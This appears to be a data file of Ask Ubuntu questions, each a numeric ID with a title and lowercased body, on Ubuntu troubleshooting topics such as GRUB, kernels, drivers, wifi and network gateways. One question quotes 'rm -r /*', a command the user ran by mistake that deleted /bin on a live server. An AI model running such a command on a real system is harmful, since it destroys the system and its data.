321766	is there a way to connect with the real router ( server ) from the fake one ?	scenario : + -- -+ eth0| s | + -- -- -- -- -- + internet ======| | | | -- -- -- pc1 | / | | switch | -- -- -- pc2 | |========| | -- -- -- pc3 | r |eth1 + -- -- -- -- -- + + -- -+ s/r : server as router eth0 : connection from the internet/other network eth1 : internal network pc1 , pc2 , pc3 : ubuntu os *addition pc4 connected to switch which is on windows os . i set pc1 , pc2 and pc4 to auto dhcp to have an access with the network and internet but pc3 is on static . pc3 has an ip address same of a router ( dhcp : interface=eth1 ) . e.g . pc3 : ( fake ) address 192.168.1.2 network 192.168.1.0 netmask 255.255.255.0 gateway 192.168.1.2 problem encounter : the pc4 can access to the network/internet while pc1 and pc2 can not . observation : window os automatically can detect real gateway ( router ) while ubuntu os can not . : ( how can we fix this if someone configured a static ip add same with the gateway ( router ) ?
321771	how do i change awn dialect applet style ?	i 've just installed awn and i want to customize it : i do n't like the look of dialect applet . how do i change it 's appearance ? it would be great if i can change from flags to just letters .
321773	mount drive at start-up but mysql ca n't see it	i 'm trying to automount my drive using the following command in startup applications : /usr/bin/udisks -- mount /dev/sdd1 however , mysql fails to start when i mount the disk . on the contrary , if i click on the drive via the gui , mysql will load normally . what is going on here ? why wo n't mysql recognize the mounted drive when mounted with the command i provided ?
321775	restored systray sometimes disappears from screen	i use unity with restored systray from timekiller repository . i had no problems with it until there was an update in proposed repository . i realized my mistake and downgraded it because it was really slow on my workstation . since this time i have been suffering from problem described in topic . in addition , when systray disappears , dash starts being slow like proposed version was . i tried to disable detection of screen refresh rate and all other hints i found ( see how to increase unity performance ) , but this helps neither to increase it 's speed nor to solve the main problem . the only workaround i have is to run unity -- replace & . then systray appears again and everything is fine until it disappears . so , how can i solve this problem ?
321780	ca n't find `` allow executing file as program '' checkbox	i 'm currently trying to run a game on xubuntu that is downloaded as a .jar and to make it work i need to check of a box that says `` allow executing file as program '' i know where the box should be for everyone else but it is n't there for me . i use xubuntu 12.04 and the check box should be under properties > permissions .
321784	ccsm/window rules/size rules : can window be maximized vertically ?	i 'd like to place any new emacs windows maximized vertically on the left half of the screen . the window rules plugin of compiz aims to solve these kind of problems , but i do n't see an option to do this there . just to restate : i do n't want do drag the window to the left until it snaps and maximizes every time i open a new window . i want this to be done automatically on per-application basis .
321787	notification theme broken	i have an almost fresh ubuntu 13.04 installation . the only thing i did was adding a ppa for the i3 window manager , and of course installed i3 . however , i do n't know if the problem i have relates to that . my notifications look very strange . removing the stuff i installed from the aforementioned ppa did not help . ideas , anyone ?
321789	i removed password from my user and it asks for my password	so today i removed the password from my user but all programs still ask for a password and i do n't know it . i tried my old password , but it did n't work .
321798	remove windows 8 bootloader from another drive	i have deleted the partition of windows 8 and resized the ubuntu partition to cover the whole disk . now i do n't want windows to show up in the boot menu . i ran sudo update-grub . it shows up found windows 8 ( loader ) on /dev/sdb1 . i have another disk ( with no os installed ) that has the the bootloader installed . how can i remove the windows 8 bootloader from that disk ? edit : output of sudo fdisk -l disk /dev/sda : 150.0 gb , 150039945216 bytes 255 heads , 63 sectors/track , 18241 cylinders , total 293046768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd58bacbf device boot start end blocks id system /dev/sda3 * 2048 293044223 146521088 5 extended /dev/sda5 4096 293044223 146520064 83 linux disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x796e4435 device boot start end blocks id system /dev/sdb1 * 2048 976769023 488383488 7 hpfs/ntfs/exfat
321802	patched kernel , everything works except the device huion 580 that was supposed to work with the patch	this is related to this question . i downloaded kernel 3.9.10 , applied the patch with patch -p1 < ../huion.patch , then i followed this instructions to compile the kernel , then i installed the deb packages that were generated , rebooted and i 'm typing this from the new kernel , uname -a reports my custom build . everything good so far . now the problem , i connect the huion 580 tablet and it does n't work . my lsusb looks like this : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 256c:006e < -- this is the tablet ! ! ! ! bus 002 device 003 : id 4168:1011 bus 002 device 004 : id 04a9:1746 canon , inc . bus 002 device 005 : id 413c:2111 dell computer corp . bus 002 device 006 : id 03f0 : a707 hewlett-packard but the tablet is not in xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ reserved targus wireless optical mouse id=8 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ dell dell usb wired entry keyboard id=9 [ slave keyboard ( 3 ) ] ↳ dell dell usb wired entry keyboard id=10 [ slave keyboard ( 3 ) ] ↳ hp webcam hd-2200 id=11 [ slave keyboard ( 3 ) ] what could be the problem ? i ca n't use mainline kernel 3.11 ( which supposedly includes the patch ) because there are no nvidia drivers that work yet . before applying the patch i run make oldconfig and left everything as default pressing enter a bunch of times . then i applied the patch and run that command again and it asked about huion driver with options [ n , m ] , i pressed n for new i think ... some people got it working with this patch , not me . how can i know if the patch was applied and that this device is supposed to get detected ? do i have to load the driver manually somehow ? edit : compiling kernel again pressing m this time , let 's see how this goes ...
321804	sony vaio fit with ubuntu 12.04 , sound missing	the speakers in my sony vaio fit svf15a1c5e do n't work , while headphones do . lspci -nn|egrep 'ultimedia|udio|sound|ac97|ac97|emu ' : 00:1b.0 audio device [ 0403 ] : intel corporation panther point high definition audio controller [ 8086:1e20 ] ( rev 04 ) aplay -l : \**** list of playback hardware devices \**** card 0 : pch [ hda intel pch ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 cat /proc/asound/car*/co* | grep codec : codec : realtek id 233 codec : intel pantherpoint hdmiow to proceed adding options snd-hda-intel enable=1 index=0 model=basic in /etc/modprobe.d/alsa-base.conf does n't help . other suggestions ?
321805	better way to convert partition from ext4 to ext2 ? ( including encrypted home )	so i ran into a situation the other day . i needed to revert my ext4 ubuntu installation to a ext2.this is because i am using truecrypt and an alternative boot loader than grub2 . i have later been able to successfully encrypt the entire disk from truecrypt using the `` entire disk method . `` so my setup is a win7 partition , two ubuntu partitions ( one ext2 , the other is an encrypted swap ( ubuntu 13.04 ) ) ) what i ended up doing after unsuccessfully following many different posts about converting partitions is ... .1 . i backed up my original ext4 partition to an external drive.2 . i then copied with `` cp -ax '' from the ext4 partition to the new ext2 partition i created.3 . then i used a live cd ( really usb stick ) to `` sudo su & & nautilus & ! '' 4 . after that i hit ctrl+h and then copied everything i found in the /home/olduser folder to the new /home/newuser folder graphically . it seems to have worked , but i feel like this was most likely more than i needed to do to successfully accomplish my task . any suggestions to downgrade a partition as i have described ? this has allowed me to use truecrypt to encrypt the entire drive , i first boot using the truecrypt boot loader , enter my password , then load the win7 boot loader which i have edited to have win7 , winxp , and ubuntu ( the ubuntu entry was added using `` neosmart tech . easybcd '' this is what required an ext2 partition to be able to find the ubuntu setup . ) entries . then everything works like a charm ! thank you in advance for this untypical setup response !
321807	mistakenly deleted files recursively from '/ ' on my still running server	i mistakenly deleted the bin folder , now most of the bin cmds do not exist . the server still works just fine but i know when i restart it , i will not like it . how can i fix this without losing system configurations and data . from comment : i was trying to reinstall roundcube on the server and deleting the previous conf file . i had switched into the directory and instead of entering rm -r . i typed rm -r /* realizing this i quickly cancelled the rm and unfortunately the /bin was already gone .
321808	how to get to settings of adobe flash player ?	adobe flash player is by default e.g . set to - always with access on webcam and microphone . how do i get to settings of adobe flash player e.g . in chrome and in firefox for to adjust privacy ? ! http : //www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager02.html
321813	set up a syslog server	i have installed ubuntu server 12.04 and i intend to set up a syslog server . any ideas would be appreciated .
321814	leaving ubuntu server	i have made a mistake of installing ubuntu server 12.10 as i have no idea how to use it . i have a windows server 2008 disk that i would like to boot but i have no idea how to boot it in ubuntu . all i see is like a command line . i want to know , how can i boot this dvd and install windows server over ubuntu ? this is an old windows xp computer . please help thanks - flynn
321816	mouse sometimes doubleclicks when i click once	i have a problem which is becoming a nightmare , to the extent that i am thinking that it might be easier to just scrap ubuntu completely and try something else . i have an hp pc running ubuntu 12.04 . when i left-click with my mouse , it sometimes double-clicks ( maybe 50 % of the time ) . so far this has led to : randomly sending unfinished emails , randomly highlighting and deleting things i did n't want to delete whilst writing emails ( very frustrating ) , randomly deleting two browser tabs instead of one ( several times ) , and ( in some sense the most annoying ) a very very frustating end-user experience when attempting to move windows around on the desktop or to cut-and-paste from a terminal window . thank goodness for alt-f7 — but i do n't want to have to learn keyboard shortcuts for every program i use as well as for the os ( and not being able to copy-paste is a great loss for me ) . i am not the only person with this problem , but googling indicates that there may well be multiple reasons for it ; none of the fixes i have read online have worked for me . let me go through everything , including fixes that have worked for other people but not for me . oh — i have an hp optical mouse . it is not a broken mouse . i have tried two mice on my system — both exhibit the problem . both of these mice work fine on my home laptop also running ubuntu 12.04 . my /etc/x11/xorg.conf is only a few lines long and has no `` inputdevice '' section . i do n't have hald , or the hal package installed . it started about a week ago , and does n't seem to be getting any better or worse . in desperation i just upgraded to 12.10 but this has not fixed the problem and now i am running a distro that is not an lts ( and hence is not ideal for me : -\ ) but it is rendering my system very hard to use . possibly important update : i tried doing some investigations with xev . it seems to me that it looks like a bad connection in these mice -- is this common ? i can hold down the mouse button , and then get ( mouse click ) ( pause ) ( mouse release ) ( very very short pause ) ( mouse click ) ( pause ) ( mouse release ) ( very very short pause ) ( mouse click ) etc . i wonder whether e.g . other operating systems say `` you ca n't release and then click again within 0.05 seconds , so that must have been a glitch and i 'll assume the button was never released '' . can i tell ubuntu to ignore release-and-then-reclick-almost-instantly events ? ? this so looks like a bad mouse issue . maybe i should dig out a newer mouse ? i 've only tried very old ones : -\
321818	alternative systray	13.04 has dropped support for old-style systray indicators . this may or may not be a step in the right direction in the long term , but it 's extremely inconvenient in the short term . there are at least four apps that i regularly use that have a systray icon , and half of those are completely unusable without it . i going to need a work-around to get by . in the old days it used to be possible to run a gnome-panel in a unity desktop , and get the old gnome2 widgets and indicators that way . however , whilst gnome-panel still runs , it also seems to have moved on and there 's no way to configure a systray any more ( or is there ? ) does anybody know of any alternative systray providers that might be compatible with a unity desktop ? maybe xfce or lxde has one ? edit : i 'm aware of the ppa with a modified unity , but that 's not ideal , and anyway i 'm running saucy , so that does n't apply .
321819	installing ubuntu 13.04 on samsung seties 5	how to install ubuntu 13.04 using usb on my samsung series 5 laptop ( windows 8 ) ? i do n't want to delete windows and i want to use both of them . thanks .
321822	how to take rcp to take daily backup of database from my ubuntu server to my local system ?	i found this article http : //www.howtogeek.com/135533/how-to-use-rsync-to-backup-your-data-on-linux/ but it looks outdated and i felt i may get a better answer at asuubuntu : ) i have a server running ubuntu 12.04 and my laptop has 12.10 , now i want to daily take backup of postgres database on the server , how can i do it ?
321823	mounting network share folder using active directory credentials	how do i mount a network share ( can be on startup or fstab ) in the windows server . my ubuntu is connected and login using active directory account , i need to find a way to let it mount department folder in network share using the account i 'm login with how to do this , a lot of cifs or smbclient way need to specify or manually insert the username or password in the script , i need to let it do it automatically . btw my ubuntu is loaded from ltsp server , and there is a lot of other user using it too .
321824	can not find canon lbp3050 driver for ubuntu 12.04	i just installed the ubuntu 12.04 , and trying to get my printer to work . in fact , i have been following the documentation and googled several pages , but still have not been successful with the issue . it seems that i need to find the canon linux capt driver version . however , as instructed , from this link ... https : //help.ubuntu.com/community/canoncaptdrv190 it seems that the download link to the driver is not dead . is there a way to find this driver file ?
321828	no kernel in grub	hi linux professionals =o i had ubuntu 12.04 3.5.0-23-generic dual boot with win7 .but there was a problem to use ati/radeon fglrx on my system so i decided to downgrade kernel ( because that driver working with kernel < = 3.4 ) . i installed linux-image.3.2.0-23-generic and linux-image.3.2.0-24-generic on my system , and i used sudo update-grub to add those kernels to grub boot loader , and output showed all kernels added to boot loader . after restart there was just 3.5.0-23 on boot loader so i thought if i uninstall 3.5.0-23 grub can load other kernels ( im taking shame = [ ) .i uninstalled linux-image-3.5.0.23generic via synaptic and after restart there is just these options on grub boot loader : memtest win7 i used live usb to get this informations : /etc/default/grub : > # if you change this file , run 'update-grub ' afterwards to update > # /boot/grub/grub.cfg . > # for full documentation of the options in this file , see : > # info -f grub -n 'simple configuration' > > grub_default= '' 0 '' > # grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` > grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' > > # uncomment to enable badram filtering , modify to suit your needs > # this works with linux ( no patch required ) and with any kernel that obtains > # the memory map information from grub ( gnu mach , kernel of freebsd ... ) > # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' > > # uncomment to disable graphical terminal ( grub-pc only ) > # grub_terminal=console > > # the resolution used on graphical terminal > # note that you can use only modes which your graphic card supports via vbe > # you can see them in real grub with the command `vbeinfo' > # grub_gfxmode=640x480 > > # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux > # grub_disable_linux_uuid=true > > # uncomment to disable generation of recovery mode menu entries > # grub_disable_recovery= '' true '' > > # uncomment to get a beep at grub start > # grub_init_tune= '' 480 440 1 '' there is nothing in /boot . 1-are those kernles ( 3.2.0.23 and 3.20.24 ) exists in my system ? 2_if they are in my system how can i add them to grub and use them ? 3-is there a way to get 3.5.0.23 kernel back ? i read similar threads before but i dont want to re-install ubuntu . please help me . : ' ( edit 1 : ubuntu @ ubuntu : / $ dpkg -l linux-image* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un linux-image < none > ( no description available ) un linux-image-3 . < none > ( no description available ) if linux-image-3 . 3.2.0-23.36 linux kernel image for version 3.2.0 on 64 b ii linux-image-3 . 3.5.0-23.35~pr linux kernel image for version 3.5.0 on 32 b ii linux-image-ge 3.5.0.23.30 generic linux kernel image edit 2 : ubuntu @ ubuntu : ~ $ ls -al /boot total 53021 drwxr-xr-x 1 root root 4096 jul 19 15:41 . drwxr-xr-x 1 ubuntu ubuntu 4096 jul 19 15:41 .. -rw-r -- r -- 1 root root 795572 apr 11 2012 abi-3.2.0-23-generic -rw-r -- r -- 1 root root 856743 jan 25 21:07 abi-3.5.0-23-generic -rw-r -- r -- 1 root root 147316 apr 11 2012 config-3.2.0-23-generic -rw-r -- r -- 1 root root 154436 jan 25 21:07 config-3.5.0-23-generic drwxr-xr-x 1 root root 4096 jun 24 17:25 grub -rw-r -- r -- 1 root root 20358320 jul 19 15:41 initrd.img-3.2.0-23-generic -rw-r -- r -- 1 root root 21986987 jul 19 15:39 initrd.img-3.5.0-23-generic -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 2252691 apr 11 2012 system.map-3.2.0-23-generic -rw -- -- -- - 1 root root 2421090 jan 25 21:07 system.map-3.5.0-23-generic -rw -- -- -- - 1 root root 4864480 apr 11 2012 vmlinuz-3.2.0-23-generic edit 3 : ubuntu @ ubuntu : $ uname -a linux ubuntu 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:41:14 utc 2012 i686 athlon i386 gnu/linux : ubuntu @ ubuntu : $ sudo dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0-9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d' linux-headers-3.5.0-23 linux-headers-3.5.0-23-generic linux-image-3.5.0-23-generic : ubuntu @ ubuntu : $ uname -sr linux 3.2.0-23-generic
321833	pointing devices , syndaemon , touchpad sensibility ( macbook pro )	i have troubles understanding how my ubuntu 13.04 is handling the touchpad of my macbook pro . very annoying because i really ca n't work with the unit as the touchpad keeps being very `` touchy '' , a single slight touch with my palm is enough to move the cursor away while i 'm typing stuff on the keyboard . on a fresh install , i have the `` systeme > souris et pavăš tactil '' ( sorry , it 's in french ! ) utility with the checkbox `` disable while typing '' . does n't work . so i installed gpointing-devices-settings via the ubuntu software center ( gsynaptics is n't maintained anymore , i read it somewhere ) . sounds like gpointingdevices handles my touchpad , but the options i check/uncheck are not persistent . each time i re-launch gpointingdevices , it 's back in the default configuration . another way to deal with the touchpad is to use syndaemon in a command line with some parameters to disable touchpad and all ( see http : //www.webupd8.org/2009/11/ubuntu-automatically-disable-touchpad.html for configurations ) . but in my fresh install , when i launch syndameon , whatever the parameters are , it just seems to destroy the handling of the touchpad , that is , no more two fingers scrolling and no more `` tap to click '' . i must reload the session to get it working again . so i 'm quite in a mist of conjecture for now : is it a bug specific to the macbook pro touchpads ? or am i not pushing the right buttons ? or what ? next to unity , my main deskop environment , i installed cynnamon desktop , maybe some package in it is messing up the touchpad settings ?
321836	ubuntu 13.04 , connected to wifi , but no internet access	i have a fresh install of ubuntu 13.04 desktop ( installed yesterday ) . wifi has been working fine for many hours , suddenly i can no longer load any pages . i have another laptop running windows 8 which i 'm now using next to my ubuntu laptop , and wifi is working fine . i 've restarted my wifi modem although it appeared to be running fine anyway . i 've disconnected , reconnected to my wifi router from the ubuntu top menu bar . i 've reboot my ubuntu laptop , still can not load any page although it looks like i 'm connected . i had the same problem about a week ago with a new install of ubuntu 13.04 ( i 've since reinstalled ) , and after about half an hour the problem went away . seems pretty unreliable though , when my windows laptop is working fine . any help would be appreciated . edit : $ ping -c5 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . -- - 8.8.8.8 ping statistics -- - 5 packets transmitted , 0 received , 100 % packet loss , time 4031ms $ sudo lshw -class network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : e0 : b9 : a5:2d:1f : bf width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-26-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : de700000-de70ffff *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 06 serial : bc : ae : c5:64:26:94 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:9000 ( size=256 ) memory : d2104000-d2104fff memory : d2100000-d2103fff $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) 02:00.0 multimedia controller : philips semiconductors saa7231 ( rev ca ) 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.0 usb controller : fresco logic fl1000g usb 3.0 host controller ( rev 04 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 ) edit2 : $ ifconfig eth0 link encap : ethernet hwaddr bc : ae : c5:64:26:94 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:743 errors:0 dropped:0 overruns:0 frame:0 tx packets:743 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:50506 ( 50.5 kb ) tx bytes:50506 ( 50.5 kb ) wlan0 link encap : ethernet hwaddr e0 : b9 : a5:2d:1f : bf inet6 addr : fe80 : :e2b9 : a5ff : fe2d:1fbf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1900 errors:0 dropped:0 overruns:0 frame:0 tx packets:982 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:457035 ( 457.0 kb ) tx bytes:107425 ( 107.4 kb ) $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.1.1 0.0.0.0 255.255.255.255 uh 0 0 0 wlan0 edit3 : $ sudo dhclient wlan0 $ ifconfig wlan0 wlan0 link encap : ethernet hwaddr e0 : b9 : a5:2d:1f : bf inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e2b9 : a5ff : fe2d:1fbf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2124 errors:0 dropped:0 overruns:0 frame:0 tx packets:1170 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:512506 ( 512.5 kb ) tx bytes:136944 ( 136.9 kb )
321837	ubuntu 12.04 grub disappear + live usb do n't work	i have two partition ; 1 for windows 8 and the other for ubuntu 12.04 ( and of course the swap.. ) . it all works perfectly but then i re-installed windows 8 so the grub disappeared and it goes directly to windows 8 ! and when i tried to boot with a live usb this error appears : '' an operating system was n't found . try disconnecting any drives that do n't contain an operating system press ctrl+alt+del to restart '' thank you !
321844	how can i rebind print screen to delete ?	i 'm running xubuntu raring ringtail . using xkbcomp , i used the following commands ( i can go into more detail as to the context and what command i use , if it 's relevant ) , which successfully remapped my delete key to end and my insert key to home , but all it seems to do is render the print screen key inert , rather than making it delete . replace key < prsc > { [ delete ] } ; replace key < dele > { [ end ] } ; replace key < ins > { [ home ] } ; is there another method by which i can make prt sc on my keyboard perform the delete function ? edit : even though xkeycaps could n't give me the keycode , i used xkbprint to get the keycode for my prtsc key and tried xmodmap -e `` keycode 107 = delete delete '' which did the same thing : made prtsc inert . to be more precise , it actually flashes the cursor in a terminal or the input box here . so i think it 's doing something other than delete ; i just do n't know the secret word other than delete to make a program do what i want .
321855	how to get real uptime ?	is there any easy way to calculate uptime excluding period system is suspended ? i would like to count time i 've spent in front of computer .
321856	why ca n't i select transmission to download torrents ?	i 've been using transmission for quite a while now for my torrents and up until recently everything has been fine . now when i click a torrent download link , transmission , or any other torrent program for that matter , will not take the download or even indicate that i selected it at all from the choose program menu . how do i fix this ? btw , i 'm a complete noob here lol but i love using ubuntu .
321860	need to buy ubuntu dvd 13.04	i need to buy ubuntu 13.04 ( or above ) dvd , but it is not in the store ... why is that ? ? and i need to take it via post how can i do it and.. i need to know the cost . i have some other ubuntu accessories to buy.. i'am in sri lanka
321862	grub2 points to the wrong harddisk after installing one more harddisk	i have a desktop with two sata hard drives installed . on one i have windows , on the other i have ubuntu 12.04 . everything works fine . now , i want to install one more hard drive . this is an ide drive . after installing the ide drive , grub no longer points to the correct hard drive and does n't find the boot directory , so i end up in grub rescue . in my grub.cfg the ubuntu installation is on hd1 . it seems that the new ide drive becomes hd0 . does that mean that my ubuntu ( and the boot directory ) now is on hd2 ( and windows on hd1 ) ? if so , how can i change this in grub so that it points to the correct hard drive ? can it be done from the grub rescue prompt ? can i boot without the ide drive installed , edit grub.cfg , torn off the computer , connect the ide drive and boot ? if i go wrong here , can i edit grub.cfg from a live cd ? or is there a better way to do this ?
321866	problem while installing ubuntu	i was installing ubuntu 12.10 from a pen drive on sony vaio ( model is : sve151d11l . 64 bit i3 processor ) using an iso image . i made the pendrive bootable by using `` universal usb installer '' . the system starts booting from the pendrive but it gets stuck on the ubuntu start screen ( the one with dots ) . on pressing esc at that screen , it shows : buffer i/o error on device sr0 , logical block 0 buffer i/o error on device sr0 , logical block 1 ... i 've been trying for hours , tried installing 13.04 instead , the same problem occurred again . please help me out . edit i opened it in another computer the pen drive worked fine .
321867	upstart service giving 'chdir : command not found ' error	i 've created an upstart conf script called watch_folder.conf that i have used successfully on a few ubuntu installs already but for some reason i 'm getting an error from the following code : # /etc/init/watch_folder.conf description `` watch folder service '' author `` jonathan topf '' start on startup stop on shutdown respawn respawn limit 99 5 script chdir /home/jon/dropbox/render\ farm\ 1/appleseed/bin exec /usr/bin/python ./watchfolder.py ../../data/ echo `` watch_folder started '' end script if i look inside /var/log/upstart/watch_folder.log i see the following /proc/self/fd/9 : line 2 : chdir : command not found /proc/self/fd/9 : line 2 : chdir : command not found /proc/self/fd/9 : line 2 : chdir : command not found /proc/self/fd/9 : line 2 : chdir : command not found /proc/self/fd/9 : line 2 : chdir : command not found /proc/self/fd/9 : line 2 : chdir : command not found ... does anybody know what may cause this error , its perplexing me !
321872	xubuntu 13.04 some images wo n't load properly in any browser	i 've had this problem for a couple of days now and i have no clue what might be causing it . when entering a particular website , it wo n't load the same images over and over again . at first i thought it was a problem with chrome , but i it 's the same with firefox and chromium . this is how i see my subscriptions feed in youtube : and this is how i see chrome 's web store : i 've tried the following things so far without any success : i 've deleted the cache of ff and chrome numerous times reinstalled chrome a couple of times and even switched versions ( from 26.0.1410.43 to 28.0.1500.71 ) i 've tried 'empty cache and hard reload ' from the context menu of the refresh button in chrome when the f12 key is pressed . even deleting the browsers ' folders from ~/.cache wo n't do the trick . the same images wo n't load every time . i completely reinstalled my xubuntu and in the beginning there was n't such a problem . however , after an hour or so ( after i finished installing my stuff ) , it appeared again . in windows i do n't have such an issue with the same google account ( s ) . incognito mode does n't help . disabling all extensions ; disabling pepper flash and enabling shockwave flash from chrome : //plugins ; reinstalling java openjdk 7 due to the fact that a forum post suggested it might be a graphics driver issue ( although regarding an amd card ) , i thought it may have something to do with my new gpu . a few weeks back i used intel hd graphics but ca n't confirm that the problem did n't occur then . now i have a gtx 760 , using the 319.32 version of nvidia 's drivers . could this be related somehow ? some people having similar issues suggested it might be a problem with the kernel ( 3.8.0-26-generic ) . however , a fresh install of xubuntu 13.04 has a 3.8.0-19-generic kernel and after installing the updates , you can choose between -19 and -26 . my gpu 's drivers are installed for the -26 kernel and when launching the -19 ( without gpu drivers installed ) the problem persists . other people stated it might be a conflict with xfce , but god , i ca n't stand the newer versions of gnome . i do n't know what to do , please help - it 's driving me insane .
321874	why are there files ending with ~ on my system ?	ive got ubuntu desktop up and running on my n54l microserver . i 've noticed however that if i 'm looking at a folder on the microserver from my windows 7 laptop , if i make a change to a file on ubuntu and save the file , on windows it creates a copy ( or a reference ) of the file but with a ~ on the end . i ca n't see it on ubuntu , only on windows , and if i delete the original file , the ~ file remains . i can delete the ~ file at any time ; it does n't seem to make any difference to the actual file . can anyone enlighten me as to what 's going on ?
